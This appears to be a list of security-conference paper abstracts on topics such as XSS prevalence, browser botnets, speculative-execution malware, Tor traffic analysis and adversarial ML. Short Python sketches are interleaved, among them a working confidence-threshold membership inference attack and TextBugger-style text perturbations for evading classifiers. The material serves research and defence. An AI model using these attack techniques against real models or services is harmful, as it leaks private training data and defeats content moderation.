The increasingly sophisticated Advanced Persistent Threat (APT) attacks have become a serious challenge for enterprise IT security. Attack causality analysis, which tracks multi-hop causal relationships between files and processes to diagnose attack provenances and consequences, is the first step towards understanding APT attacks and taking appropriate responses. Since attack causality analysis is a time-critical mission, it is essential to design causality tracking systems that extract useful attack information in a timely manner. However, prior work is limited in serving this need. Existing approaches have largely focused on pruning causal dependencies totally irrelevant to the attack, but fail to differentiate and prioritize abnormal events among numerous relevant, yet benign and complicated system operations, resulting in long investigation times and slow responses. To address this problem, we propose PRIOTRACKER, a backward and forward causality tracker that automatically prioritizes the investigation of abnormal causal dependencies in the tracking process. Specifically, to assess the priority of a system event, we consider its rareness and topological features in the causality graph. To distinguish unusual operations from normal system events, we quantify the rareness of each event by developing a reference model which records common routine activities in corporate computer systems. We implement PRIOTRACKER in 20K lines of Java code, and a reference model builder in 10K lines of Java code. We evaluate our tool by deploying both systems in a real enterprise IT environment, where we collected 1 TB of data covering 2.5 billion OS events from 150 machines in one week. Experimental results show that PRIOTRACKER can capture attack traces that are missed by existing trackers and reduce the analysis time by up to two orders of magnitude.
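
The prioritization itself is compact: score each causal edge by its rareness under the reference model (and its topology), and expand the graph with a priority queue instead of plain BFS, so rare dependencies are investigated first. A toy sketch with invented events and frequencies:

```python
# Priority-driven causality tracking: rare edges first.
import heapq

reference_freq = {"cron->sh": 0.90, "sh->logrotate": 0.95,
                  "sh->curl": 0.02, "curl->tmpfile": 0.00}
graph = {"cron->sh": ["sh->logrotate", "sh->curl"],
         "sh->logrotate": [], "sh->curl": ["curl->tmpfile"], "curl->tmpfile": []}

def priority(event, fanout):
    rareness = 1.0 - reference_freq.get(event, 0.0)   # unseen events are rarest
    return -(rareness / (1 + fanout))                 # heapq pops smallest first

pq = [(priority("cron->sh", 2), "cron->sh")]
while pq:
    _, event = heapq.heappop(pq)
    print("investigate:", event)      # rare sh->curl is expanded before logrotate
    for nxt in graph[event]:
        heapq.heappush(pq, (priority(nxt, len(graph[nxt])), nxt))
```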

JSgraph: Enabling Reconstruction of Web Attacks via Efficient Tracking of Live In-Browser JavaScript Executions

In this paper, we propose JSgraph, a forensic engine that is able to efficiently record fine-grained details pertaining to the execution of JavaScript (JS) programs within the browser, with particular focus on JS-driven DOM modifications. JSgraph’s main goal is to enable a detailed, post-mortem reconstruction of ephemeral JS-based web attacks experienced by real network users. In particular, we aim to enable the reconstruction of social engineering attacks that result in the download of malicious executable files or browser extensions, among other attacks. We implement JSgraph by instrumenting Chromium’s code base at the interface between Blink and V8, the rendering and JavaScript engines. We design JSgraph to be lightweight, highly portable, and to require low storage capacity for its fine-grained audit logs. Using a variety of both in-the-wild and lab-reproduced web attacks, we demonstrate how JSgraph can aid the forensic investigation process. We then show that JSgraph introduces acceptable overhead, with a median overhead on popular website page loads between 3.2% and 3.9%.

Session 10: Social Networks and Anonymity

Investigating Ad Transparency Mechanisms in Social Media: A Case Study of Facebook's Explanations

Targeted advertising has been subject to many privacy complaints from both users and policy makers. Despite this attention, users still have little understanding of what data the advertising platforms have about them and why they are shown particular ads. To address such concerns, Facebook recently introduced two transparency mechanisms: a “Why am I seeing this?” button that provides users with an explanation of why they were shown a particular ad (ad explanations), and an Ad Preferences Page that provides users with a list of attributes Facebook has inferred about them and how (data explanations). In this paper, we investigate the level of transparency provided by these two mechanisms. We first define a number of key properties of explanations and then evaluate empirically whether Facebook’s explanations satisfy them. For our experiments, we develop a browser extension that collects the ads users receive every time they browse Facebook, their respective explanations, and the attributes listed on the Ad Preferences Page; we then use controlled experiments where we create our own ad campaigns and target the users that installed our extension. Our results show that ad explanations are often incomplete and sometimes misleading while data explanations are often incomplete and vague. Taken together, our findings have significant implications for users, policy makers, and regulators as social media advertising services mature.

Inside Job: Applying Traffic Analysis to Measure Tor from Within

In this paper, we explore traffic analysis attacks on Tor that are conducted solely with middle relays rather than with relays from the entry or exit positions. We create a methodology to apply novel Tor circuit and website fingerprinting from middle relays to detect onion service usage; that is, we are able to identify websites with hidden network addresses by their traffic patterns. We also carry out the first privacy-preserving popularity measurement of a single social networking website hosted as an onion service by deploying our novel circuit and website fingerprinting techniques in the wild. Our results show: (i) that the middle position enables wide-scale monitoring and measurement not possible from a comparable resource deployment in other relay positions, (ii) that traffic fingerprinting techniques are as effective from the middle relay position as prior works show from a guard relay, and (iii) that an adversary can use our fingerprinting methodology to discover the popularity of onion services, or as a filter to target specific nodes in the network, such as particular guard relays.

Smoke Screener or Straight Shooter: Detecting Elite Sybil Attacks in User-Review Social Networks

Popular User-Review Social Networks (URSNs)—such as Dianping, Yelp, and Amazon—are often the targets of reputation attacks in which fake reviews are posted in order to boost or diminish the ratings of listed products and services. These attacks often emanate from a collection of accounts, called Sybils, which are collectively managed by a group of real users. A new advanced scheme, which we term elite Sybil attacks, recruits organically highly-rated accounts to generate seemingly trustworthy and realistic-looking reviews. These elite Sybil accounts taken together form a large-scale sparsely-knit Sybil network for which existing Sybil fake-review defense systems are unlikely to succeed. In this paper, we conduct the first study to define, characterize, and detect elite Sybil attacks. We show that contemporary elite Sybil attacks have a hybrid architecture, with the first tier recruiting elite Sybil workers and distributing tasks by Sybil organizers, and with the second tier posting fake reviews for profit by elite Sybil workers. We design ELSIEDET, a three-stage Sybil detection scheme, which first separates out suspicious groups of users, then identifies the campaign windows, and finally identifies elite Sybil users participating in the campaigns. We perform a large-scale empirical study on ten million reviews from Dianping, by far the most popular URSN service in China. Our results show that elite Sybil users spread their reviews out more over time, craft more convincing reviews, and bypass filters at higher rates. We also measure the impact of Sybil campaigns on various industries (such as cinemas, hotels, restaurants) as well as chain stores, and demonstrate that monitoring elite Sybil users over time can provide valuable early alerts against Sybil campaigns.

2019 Programme dblp

1B: Web Security

Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild

The Web has become highly interactive and an important driver for modern life, enabling information retrieval, social exchange, and online shopping. From the security perspective, Cross-Site Scripting (XSS) is one of the most nefarious attacks against Web clients. Research has long since focused on three categories of XSS: Reflected, Persistent, and DOM-based XSS. In this paper, we argue that our community must consider at least four important classes of XSS, and present the first systematic study of the threat of Persistent Client-Side XSS, caused by the insecure use of client-side storage. While the existence of this class has been acknowledged, especially by the non-academic community like OWASP, prior works have either only found such flaws as side effects of other analyses or focused on a limited set of applications to analyze. Therefore, the community lacks in-depth knowledge about the actual prevalence of Persistent Client-Side XSS in the wild.

To close this research gap, we leverage taint tracking to identify suspicious flows from client-side persistent storage (Web Storage, cookies) to dangerous sinks (HTML, JavaScript, and script.src).
We discuss two attacker models capable of injecting malicious payloads into storage, i.e., a Network Attacker capable of temporarily hijacking HTTP communication (e.g., in a public WiFi), and a Web Attacker who can leverage flows into storage or an existing reflected XSS flaw to persist their payload. With our taint-aware browser and these models in mind, we study the prevalence of Persistent Client-Side XSS in the Alexa Top 5,000 domains.
We find that more than 8% of them have unfiltered data flows from persistent storage to a dangerous sink, which showcases the developers’ inherent trust in the integrity of storage content. Even worse, if we only consider sites that make use of data originating from storage, 21% of the sites are vulnerable. For those sites with vulnerable flows from storage to sink, we find that at least 70% are directly exploitable by our attacker models. Finally, investigating the vulnerable flows originating from storage allows us to categorize them into four disjoint categories and propose appropriate mitigations.
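
The paper's detection needs a taint-aware browser, but the most blatant instances of the vulnerable pattern can be grepped for statically. A very rough heuristic sketch (it only catches same-line flows and misses the indirect flows that dominate in practice):

```python
# Heuristic scan for storage-to-sink flows in JavaScript source.
import re

SOURCE = r"(?:localStorage|sessionStorage)\.getItem\([^)]*\)|document\.cookie"
SINK = r"(?:innerHTML|outerHTML)\s*=|document\.write\(|eval\("

def suspicious_lines(js_code):
    for no, line in enumerate(js_code.splitlines(), 1):
        if re.search(SOURCE, line) and re.search(SINK, line):
            yield no, line.strip()

sample = """
var theme = localStorage.getItem('theme');
banner.innerHTML = localStorage.getItem('bannerHtml');
"""
for no, line in suspicious_lines(sample):
    print(no, line)   # flags the storage -> innerHTML flow on line 3
```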

Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation

The proliferation of web applications has essentially transformed modern browsers into small but powerful operating systems. Upon visiting a website, user devices run implicitly trusted script code, the execution of which is confined within the browser to prevent any interference with the user’s system. Recent JavaScript APIs, however, provide advanced capabilities that not only enable feature-rich web applications, but also allow attackers to perform malicious operations despite the confined nature of JavaScript code execution.
In this paper, we demonstrate the powerful capabilities that modern browser APIs provide to attackers by presenting MarioNet: a framework that allows a remote malicious entity to control a visitor’s browser and abuse its resources for unwanted computation or harmful operations, such as cryptocurrency mining, password-cracking, and DDoS. MarioNet relies solely on already available HTML5 APIs, without requiring the installation of any additional software. In contrast to previous browser-based botnets, the persistence and stealthiness characteristics of MarioNet allow the malicious computations to continue in the background of the browser even after the user closes the window or tab of the initially visited malicious website. We present the design, implementation, and evaluation of our prototype system, which is compatible with all major browsers, and discuss potential defense strategies to counter the threat of such persistent in-browser attacks. Our main goal is to raise awareness about this new class of attacks, and inform the design of future browser APIs so that they provide a more secure client-side environment for web applications.

Tranco: A Research-Oriented Top Sites Ranking Hardened Against Manipulation

In order to evaluate the prevalence of security and privacy practices on a representative sample of the Web, researchers rely on website popularity rankings such as the Alexa list. While the validity and representativeness of these rankings are rarely questioned, our findings show the contrary: we show for four main rankings how their inherent properties (similarity, stability, representativeness, responsiveness and benignness) affect their composition and therefore potentially skew the conclusions made in studies. Moreover, we find that it is trivial for an adversary to manipulate the composition of these lists. We are the first to empirically validate that the ranks of domains in each of the lists are easily altered, in the case of Alexa through as little as a single HTTP request. This allows adversaries to manipulate rankings on a large scale and insert malicious domains into whitelists or bend the outcome of research studies to their will. To overcome the limitations of such rankings, we propose improvements to reduce the fluctuations in list composition and guarantee better defenses against manipulation. To allow the research community to work with reliable and reproducible rankings, we provide Tranco, an improved ranking that we offer through an online service available at https://tranco-list.eu.
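
The aggregation that makes the combined list harder to game is simple at its core: average a domain's standing across providers (and, for Tranco, across days), so pumping a single list barely moves the result. A minimal sketch of a Dowdall-style rule, where a domain scores 1/rank in each list (toy data):

```python
# Dowdall-style rank aggregation across several provider lists.
from collections import defaultdict

lists = {
    "providerA": ["google.com", "facebook.com", "evil.example"],
    "providerB": ["google.com", "youtube.com", "facebook.com"],
    "providerC": ["facebook.com", "google.com", "youtube.com"],
}

scores = defaultdict(float)
for ranking in lists.values():
    for rank, domain in enumerate(ranking, 1):
        scores[domain] += 1.0 / rank

combined = sorted(scores, key=scores.get, reverse=True)
print(combined)   # a domain inserted into a single list stays near the bottom
```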

JavaScript Template Attacks: Automatically Inferring Host Information for Targeted Exploits

Today, more and more web browsers and extensions provide anonymity features to hide user details. Primarily used to evade tracking by websites and advertisements, these features are also used by criminals to prevent identification. Thus, not only tracking companies but also law-enforcement agencies have an interest in finding flaws which break these anonymity features. For instance, for targeted exploitation using zero days, it is essential to have as much information about the target as possible. A failed exploitation attempt, e.g., due to a wrongly guessed operating system, can burn the zero-day, effectively costing the attacker money. Also for side-channel attacks, it is of the utmost importance to know certain aspects of the victim’s hardware configuration, e.g., the instruction-set architecture. Moreover, knowledge about specific environmental properties, such as the operating system, allows crafting more plausible dialogues for phishing attacks.

In this paper, we present a fully automated approach to find subtle differences in browser engines caused by the environment. Furthermore, we present two new side-channel attacks on browser engines to detect the instruction-set architecture and the used memory allocator. Using these differences, we can deduce information about the system, both about the software as well as the hardware. As a result, we can not only ease the creation of fingerprints, but we also gain the advantage of having a more precise picture for targeted exploitation. Our approach allows automating the cumbersome manual search for such differences. We collect all data available to the JavaScript engine and build templates from these properties. If a property of such a template stays the same on one system but differs on a different system, we have found an environment-dependent property.

We found environment-dependent properties in Firefox, Chrome, Edge, and mobile Tor, allowing us to reveal the underlying operating system, CPU architecture, used privacy-enhancing plugins, as well as the exact browser version. We stress that our method should be used in the development of browsers and privacy extensions to automatically find flaws in the implementation.

Latex Gloves: Protecting Browser Extensions from Probing and Revelation Attacks

Browser extensions enable a rich experience for the users of today’s web. Being deployed with elevated privileges, extensions are given the power to overrule web pages. As a result, web pages often seek to detect the installed extensions, sometimes for benign adaptation of their behavior but sometimes as part of privacy-violating user fingerprinting. Researchers have studied a class of attacks that allow detecting extensions by probing for Web Accessible Resources (WARs) via URLs that include public extension IDs. Realizing the privacy risks associated with WARs, Firefox has recently moved to randomize a browser extension’s ID, prompting the Chrome team to plan to follow the same path. However, rather than mitigating the issue, the randomized IDs can in fact exacerbate the extension detection problem, enabling attackers to use a randomized ID as a reliable fingerprint of a user. We study a class of extension revelation attacks, where extensions reveal themselves by injecting their code on web pages. We demonstrate how a combination of revelation and probing can uniquely identify 90% of all extensions injecting content, in spite of a randomization scheme. We perform a series of large-scale studies to estimate possible implications of both classes of attacks. As a countermeasure, we propose a browser-based mechanism that enables control over which extensions are loaded on which web pages and present a proof-of-concept implementation which blocks both classes of attacks.

maTLS: How to Make TLS middlebox-aware?

Middleboxes (MBs) are widely deployed to enhance security and performance in networking. However, as communication over TLS becomes increasingly common, the end-to-end channel model of TLS undermines the efficacy of MBs. Existing solutions, such as 'split TLS', which intercepts TLS sessions, often introduce significant security risks by installing a custom root certificate or sharing a private key. Many studies have confirmed the vulnerabilities of combining TLS with MBs, including certificate validation failures, unwanted content modification, and the use of obsolete ciphersuites. To address these issues, we introduce an MB-aware TLS protocol, dubbed maTLS, that allows MBs to participate in the TLS session in a visible and accountable fashion. Every participating MB splits a session into two segments with its own security parameters, in collaboration with the two endpoints. The session nevertheless remains secure, as the maTLS protocol is designed to achieve authentication of MBs, auditing of MBs' operations, and verification of the security parameters of each segment. We carry out testbed-based experiments showing that maTLS achieves these security goals with marginal overhead. We also prove the security model of maTLS using Tamarin, a security verification tool.

2B: Malware and Threats

Cracking the Wall of Confinement: Understanding and Analyzing Malicious Domain Take-downs

Take-down operations aim to disrupt cybercrime involving malicious domains. In the past decade, many successful take-down operations have been reported, including those against the Conficker worm and, most recently, against VPNFilter. Although it plays an important role in fighting cybercrime, the domain take-down procedure is still surprisingly opaque. There seems to be no in-depth understanding of how the take-down operation works and whether there is due diligence to ensure its security and reliability.

In this paper, we report the first systematic study on domain take-downs. Our study was made possible via a large collection of data, including various sinkhole feeds and blacklists, passive DNS data spanning six years, and historical WHOIS information. Over these datasets, we built a unique methodology that extensively used various reverse lookups and other data analysis techniques to address the challenges in identifying taken-down domains, sinkhole operators, and take-down durations. Applying the methodology to the data, we discovered over 620K taken-down domains and conducted a longitudinal analysis of the take-down process, thus facilitating a better understanding of the operation and its weaknesses. We found that more than 14% of the domains taken down over the past ten months have been released back to the domain market, and that some of the released domains have been repurchased by malicious actors before being captured and seized again, either by the same or a different sinkhole. In addition, we showed that the misconfiguration of DNS records corresponding to the sinkholed domains allowed us to hijack a domain that was seized by the FBI. Further, we found that expired sinkholes have caused the transfer of around 30K taken-down domains whose traffic is now under the control of new owners.

Cleaning Up the Internet of Evil Things: Real-World Evidence on ISP and Consumer Efforts to Remove Mirai

With the rise of IoT botnets, the remediation of infected devices has become a critical task. As over 87% of these devices reside in broadband networks, this task will fall primarily to consumers and Internet Service Providers. We present the first empirical study of IoT malware cleanup in the wild – more specifically, of removing Mirai infections in the network of a medium-sized ISP. To measure remediation rates, we combine data from an observational study and a randomized controlled trial involving 220 consumers who suffered a Mirai infection, together with data from honeypots and darknets. We find that quarantining and notifying infected customers via a walled garden, a best practice from ISP botnet mitigation for conventional malware, remediates 92% of the infections within 14 days. Email-only notifications have no observable impact compared to a control group where no notifications were sent. We also measure surprisingly high natural remediation rates of 58-74% for this control group and for two reference networks where users were also not notified. Even more surprising, reinfection rates are low. Only 5% of the customers who remediated suffered another infection in the five months after our first study. This stands in contrast to our lab tests, which observed reinfection of real IoT devices within minutes – a discrepancy for which we explore various possible explanations, but find no satisfactory answer. We gather data on customer experiences and actions via 76 phone interviews and the communication logs of the ISP. Remediation succeeds even though many users operate from the wrong mental model – e.g., they run anti-virus software on their PC to solve the infection of an IoT device. While quarantining infected devices is clearly highly effective, future work will have to resolve several remaining mysteries. Furthermore, it will be hard to scale up the walled garden solution because of the weak incentives of the ISPs.

Measurement and Analysis of Hajime, a Peer-to-peer IoT Botnet

The Internet of Things (IoT) introduces an unprecedented diversity and ubiquity to networked computing. It also introduces new attack surfaces that are a boon to attackers. The recent Mirai botnet showed the potential and power of a collection of compromised IoT devices. A new botnet, known as Hajime, targets many of the same devices as Mirai, but differs considerably in its design and operation. Hajime uses a public peer-to-peer system as its command and control infrastructure, and regularly introduces new exploits, thereby increasing its resilience.

We show that Hajime’s distributed design makes it a valuable tool for better understanding IoT botnets. For instance, Hajime cleanly separates its bots into different peer groups depending on their underlying hardware architecture. Through detailed measurement—active scanning of Hajime’s peer-to-peer infrastructure and passive, longitudinal collection of root DNS backscatter traffic—we show that Hajime can be used as a lens into how IoT botnets operate, what kinds of devices they compromise, and what countries are more (or less) susceptible. Our results show that there are more compromised IoT devices than previously reported; that these devices use an assortment of CPU architectures, the popularity of which varies widely by country; that churn is high among IoT devices; and that new exploits can quickly and drastically increase the size and power of IoT botnets. Our code and data are available to assist future efforts to measure and mitigate the growing threat of IoT botnets.

Countering Malicious Processes with Process-DNS Association

Modern malware and cyber attacks depend heavily on DNS services to make their campaigns reliable and difficult to track. Monitoring network DNS activities and blocking suspicious domains has proven to be an effective technique in countering such attacks. However, recent successful campaigns reveal that attackers adapt by using seemingly benign domains and public web storage services to hide malicious activity. Also, the recent support for encrypted DNS queries provides attackers easier means to hide malicious traffic from network-based DNS monitoring.

We propose PDNS, an end-point DNS monitoring system based on DNS sensors deployed at each host in a network, along with a centralized backend analysis server. To detect such attacks, PDNS expands the monitored DNS activity context and examines the process context which triggered that activity. Specifically, each deployed PDNS sensor matches the domain name and the IP address of a DNS query with the process ID, binary signature, loaded DLLs, and code-signing information of the program that initiated it. We evaluate PDNS on a DNS activity dataset collected from 126 enterprise hosts and with data from multiple malware sources. Using ML classifiers including a DNN, our results outperform most previous works with high detection accuracy: a true positive rate of 98.55% and a low false positive rate of 0.03%.

ExSpectre: Hiding Malware in Speculative Execution

Recently, the Spectre and Meltdown attacks revealed serious vulnerabilities in modern CPU designs, allowing an attacker to exfiltrate data from sensitive programs. These vulnerabilities take advantage of speculative execution to coerce a processor to perform computation that would otherwise not occur, leaking the resulting information via side channels to an attacker.

In this paper, we extend these ideas in a different direction, and leverage speculative execution in order to hide malware from both static and dynamic analysis. Using this technique, critical portions of a malicious program’s computation can be shielded from view, such that even a debugger following an instruction-level trace of the program cannot tell how its results were computed.

We introduce ExSpectre, which compiles arbitrary malicious code into a seemingly-benign payload binary. When a separate trigger program runs on the same machine, it mistrains the CPU’s branch predictor, causing the payload program to speculatively execute its malicious payload, which communicates speculative results back to the rest of the payload program to change its real-world behavior.

We study the extent and types of execution that can be performed speculatively, and demonstrate several computations that can be performed covertly. In particular, within speculative execution we are able to decrypt memory using AES-NI instructions at over 11 kbps. Building on this, we decrypt and interpret a custom virtual machine language to perform arbitrary computation and system calls in the real world. We demonstrate this with a proof-of-concept dial back shell, which takes only a few milliseconds to execute after the trigger is issued. We also show how our corresponding trigger program can be a pre-existing benign application already running on the system, and demonstrate this concept with OpenSSL driven remotely by the attacker as a trigger program.

ExSpectre demonstrates a new kind of malware that evades existing reverse engineering and binary analysis techniques. Because its true functionality is contained in seemingly unreachable dead code, and its control flow driven externally by potentially any other program running at the same time, ExSpectre poses a novel threat to state-of-the-art malware analysis techniques.

3A: Adversarial Machine Learning

ML-Leaks: Model and Data Independent Membership Inference Attacks and Defenses on Machine Learning Models

Machine learning (ML) has become a core component of many real-world applications and training data is a key factor that drives current progress. This huge success has led Internet companies to deploy machine learning as a service (MLaaS). Recently, the first membership inference attack has shown that extraction of information on the training set is possible in such MLaaS settings, which has severe security and privacy implications.

However, the early demonstrations of the feasibility of such attacks make many assumptions about the adversary, such as using multiple so-called shadow models, knowledge of the target model structure, and having a dataset from the same distribution as the target model’s training data. We relax all these key assumptions, thereby showing that such attacks are very broadly applicable at low cost and consequently pose a more severe risk than previously thought. We present the most comprehensive study so far on this emerging and developing threat, using eight diverse datasets that show the viability of the proposed attacks across domains.

In addition, we propose the first effective defense mechanisms against this broader class of membership inference attacks that maintain a high level of utility of the ML model.
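
To make the relaxed adversary concrete, here is a minimal sketch of a shadow-model-free membership inference attack that simply thresholds the target model's prediction confidence. The dataset, model, and threshold below are illustrative assumptions, not the paper's exact setup.

```python
from sklearn.datasets import load_breast_cancer
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split

X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

# A flexible model tends to overfit, widening the member/non-member gap.
target = RandomForestClassifier(random_state=0).fit(X_train, y_train)

def infer_membership(model, samples, threshold=0.95):
    """Guess 'member' whenever the model is very confident on a sample."""
    return model.predict_proba(samples).max(axis=1) >= threshold

# Training points (members) should be flagged far more often than test points.
print("members flagged:    ", infer_membership(target, X_train).mean())
print("non-members flagged:", infer_membership(target, X_test).mean())
```

The gap between the two printed rates is the basic signal; the paper's attacks refine it and show it survives without shadow models or knowledge of the target's architecture.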

MBeacon: Privacy-Preserving Beacons for DNA Methylation Data

The advancement of molecular profiling techniques fuels biomedical research with a deluge of data. To facilitate data sharing, the Global Alliance for Genomics and Health established the Beacon system, a search engine designed to help researchers find datasets of interest. While the current Beacon system only supports genomic data, other types of biomedical data, such as DNA methylation, are also essential for advancing our understanding in the field. In this paper, we propose the first Beacon system for DNA methylation data sharing: MBeacon. As the current genomic Beacon is vulnerable to privacy attacks, such as membership inference, and DNA methylation data is highly sensitive, we take a privacy-by-design approach to construct MBeacon. First, we demonstrate the privacy threat, by proposing a membership inference attack tailored specifically to unprotected methylation Beacons. Our experimental results show that 100 queries are sufficient to achieve a successful attack with AUC (area under the ROC curve) above 0.9. To remedy this situation, we propose a novel differential privacy mechanism, namely SVT^2, which is the core component of MBeacon. Extensive experiments over multiple datasets show that SVT^2 can successfully mitigate membership privacy risks without significantly harming utility. We further implement a fully functional prototype of MBeacon which we make available to the research community.
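
For background, SVT^2 builds on the sparse vector technique (SVT) from differential privacy. The sketch below shows the classic AboveThreshold/Sparse variant with its textbook noise scales; SVT^2 itself is the paper's novel mechanism and is not reproduced here.

```python
import numpy as np

def sparse_vector(query_answers, threshold, epsilon, c=1, sensitivity=1):
    """Answer above-threshold queries under differential privacy,
    stopping after c positive answers (textbook Sparse noise scales)."""
    rho = np.random.laplace(scale=2 * c * sensitivity / epsilon)  # noisy threshold
    outputs, positives = [], 0
    for answer in query_answers:
        nu = np.random.laplace(scale=4 * c * sensitivity / epsilon)  # per-query noise
        above = bool(answer + nu >= threshold + rho)
        outputs.append(above)
        if above:
            positives += 1
            if positives >= c:
                break  # budget for positive answers is exhausted
            rho = np.random.laplace(scale=2 * c * sensitivity / epsilon)  # fresh threshold noise
    return outputs

print(sparse_vector([3, 9, 1, 12, 7], threshold=8, epsilon=1.0, c=2))
```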

Stealthy Adversarial Perturbations Against Real-Time Video Classification Systems

Recent research has demonstrated the brittleness of machine learning systems to adversarial perturbations. However, the studies have been mostly limited to perturbations on images and, more generally, classification tasks that do not deal with real-time stream inputs. In this paper, we ask: “Are adversarial perturbations that cause misclassification in real-time video classification systems possible, and if so, what properties must they satisfy?” Real-time video classification systems find application in surveillance, smart vehicles, and smart elderly care, and thus misclassification could be particularly harmful (e.g., a mishap at an elderly care facility may be missed). Video classification systems take video clips as inputs, and these clip boundaries are not deterministic. We show that perturbations that do not account for the indeterminism in the clip boundaries input to the video classifier fail to achieve high attack success rates. We propose novel approaches for generating 3D adversarial perturbations (perturbation clips) that exploit recent advances in generative models to not only overcome this key challenge but also provide stealth. In particular, our most potent 3D adversarial perturbations cause targeted activities in video streams to be misclassified with rates over 80%. At the same time, they also ensure that the perturbations leave other (untargeted) activities largely unaffected, making them extremely stealthy. Finally, we also derive a single-frame (2D) perturbation that can be applied to every frame in a video stream, and which in many cases achieves extremely high misclassification rates.

NIC: Detecting Adversarial Samples with Neural Network Invariant Checking

Deep Neural Networks (DNN) are vulnerable to adversarial samples that are generated by perturbing correctly classified inputs to cause DNN models to misbehave (e.g., misclassification). This can potentially lead to disastrous consequences especially in security-sensitive applications. Existing defense and detection techniques work well for specific attacks under various assumptions (e.g., the set of possible attacks are known beforehand). However, they are not sufficiently general to protect against a broader range of attacks. In this paper, we analyze the internals of DNN models under various attacks and identify two common exploitation channels: the provenance channel and the activation value distribution channel. We then propose a novel technique to extract DNN invariants and use them to perform runtime adversarial sample detection. Our experimental results with 11 different kinds of attacks on popular datasets (including ImageNet) and 13 models show that our technique can effectively detect all these attacks (over 90% accuracy) with limited false positives. We also compare it with three state-of-the-art techniques including the Local Intrinsic Dimensionality (LID) based method, denoiser based methods (i.e., MagNet and HGD), and the prediction inconsistency based approach (i.e., feature squeezing). Our experiments show promising results.

TextBugger: Generating Adversarial Text Against Real-world Applications

Deep Learning-based Text Understanding (DLTU) is the backbone technique behind various applications, including question answering, machine translation, and text classification. Despite its tremendous popularity, the security vulnerabilities of DLTU are still largely unknown, which is highly concerning given its increasing use in security-sensitive applications such as user sentiment analysis and toxic content detection. In this paper, we show that DLTU is inherently vulnerable to adversarial text attacks, in which maliciously crafted text triggers target DLTU systems and services to misbehave. Specifically, we present TextBugger, a general attack framework for generating adversarial text. In contrast to prior work, TextBugger differs in significant ways: (i) effective – it outperforms state-of-the-art attacks in terms of attack success rate; (ii) evasive – it preserves the utility of benign text, with 94.9% of the adversarial text correctly recognized by human readers; and (iii) efficient – it generates adversarial text with computational complexity sub-linear to the text length. We empirically evaluate TextBugger on a set of real-world DLTU systems and services used for sentiment analysis and toxic content detection, demonstrating its effectiveness, evasiveness, and efficiency. For instance, TextBugger achieves a 100% success rate on the IMDB dataset against Amazon AWS Comprehend within 4.61 seconds while preserving 97% semantic similarity. We further discuss possible defense mechanisms to mitigate such attacks and the adversary’s potential countermeasures, which leads to promising directions for further research.
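
A minimal sketch of the character-level perturbations ("bugs") such attacks apply to important words; the operations follow the paper's description at a high level, but the word-importance scoring and the choice among operations here are simplified assumptions.

```python
import random

SUBSTITUTES = {"o": "0", "l": "1", "i": "1", "a": "@", "e": "3"}  # visually similar

def insert(word):    # insert a space; humans still read the word as one token
    i = random.randrange(1, len(word))
    return word[:i] + " " + word[i:]

def delete(word):    # drop a middle character
    i = random.randrange(1, len(word) - 1)
    return word[:i] + word[i + 1:]

def swap(word):      # swap two adjacent middle characters
    i = random.randrange(1, len(word) - 2)
    return word[:i] + word[i + 1] + word[i] + word[i + 2:]

def sub_char(word):  # replace one character with a visually similar one
    for c, rep in SUBSTITUTES.items():
        if c in word:
            return word.replace(c, rep, 1)
    return word

word = "foolish"
for bug in (insert, delete, swap, sub_char):
    print(bug.__name__, "->", bug(word))
```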

3B-2: Censorship

The use of TLS in Censorship Circumvention

TLS, the Transport Layer Security protocol, has quickly become the most popular protocol on the Internet, already used to load over 70% of web pages in Mozilla Firefox. Due to its ubiquity, TLS is also a popular protocol for censorship circumvention tools, including Tor and Signal, among others.

However, the wide range of features supported in TLS makes it possible to distinguish implementations from one another by what set of cipher suites, elliptic curves, signature algorithms, and other extensions they support. Already, censors have used deep packet inspection (DPI) to identify and block popular circumvention tools based on the fingerprint of their TLS implementation.

In response, many circumvention tools have attempted to mimic popular TLS implementations such as browsers, but this technique has several challenges. First, it is burdensome to keep up with the rapidly-changing browser TLS implementations, and know what fingerprints would be good candidates to mimic. Second, TLS implementations can be difficult to mimic correctly, as they offer many features that may not be supported by the relatively lightweight libraries used in typical circumvention tools. Finally, dependency changes and updates to the underlying libraries can silently impact what an application’s TLS fingerprint looks like, making it difficult for tools to control.

In this paper, we collect and analyze real-world TLS traffic from over 11.8 billion TLS connections over 9 months to identify a wide range of TLS client implementations actually used on the Internet. We use our data to analyze TLS implementations of several popular censorship circumvention tools, including Lantern, Psiphon, Signal, Outline, Tapdance, and Tor (Snowflake and meek). We find that many of these tools use TLS configurations that are easily distinguishable from the real-world traffic they attempt to mimic, even when these tools have put effort into parroting popular TLS implementations.

To address this problem, we have developed a library, uTLS, that enables tool maintainers to automatically mimic other popular TLS implementations. Using our real-world traffic dataset, we identify many popular TLS implementations that uTLS can correctly mimic, and we describe ways our tool can adapt more flexibly to the dynamic TLS ecosystem with minimal manual effort.
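
The fingerprinting problem itself is easy to illustrate: a ClientHello exposes an ordered list of ciphers, extensions, curves, and point formats that identifies the implementation. One common way to summarize this is a JA3-style hash, sketched below over hypothetical field values (uTLS itself is a Go library, so this Python sketch only illustrates the fingerprint, not the mimicry).

```python
import hashlib

def ja3(version, ciphers, extensions, curves, point_formats):
    """JA3: md5 over comma-separated fields, dash-separated values."""
    fields = [str(version),
              "-".join(map(str, ciphers)),
              "-".join(map(str, extensions)),
              "-".join(map(str, curves)),
              "-".join(map(str, point_formats))]
    return hashlib.md5(",".join(fields).encode()).hexdigest()

# Hypothetical ClientHello of a circumvention tool: any difference from a
# real browser's lists yields a different, and therefore blockable, hash.
print(ja3(771, [4865, 4866, 4867], [0, 23, 65281], [29, 23, 24], [0]))
```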

On the Challenges of Geographical Avoidance for Tor

Traffic-analysis attacks are a persisting threat for Tor users. When censors or law enforcement agencies try to identify users, they conduct traffic-confirmation attacks and monitor encrypted transmissions to extract metadata—in combination with routing attacks, these attacks become sufficiently powerful to de-anonymize users. While traffic-analysis attacks are hard to detect and expensive to counter in practice, geographical avoidance provides an option to reject circuits that might be routed through an untrusted area. Unfortunately, recently proposed solutions introduce severe security issues by imprudent design decisions.

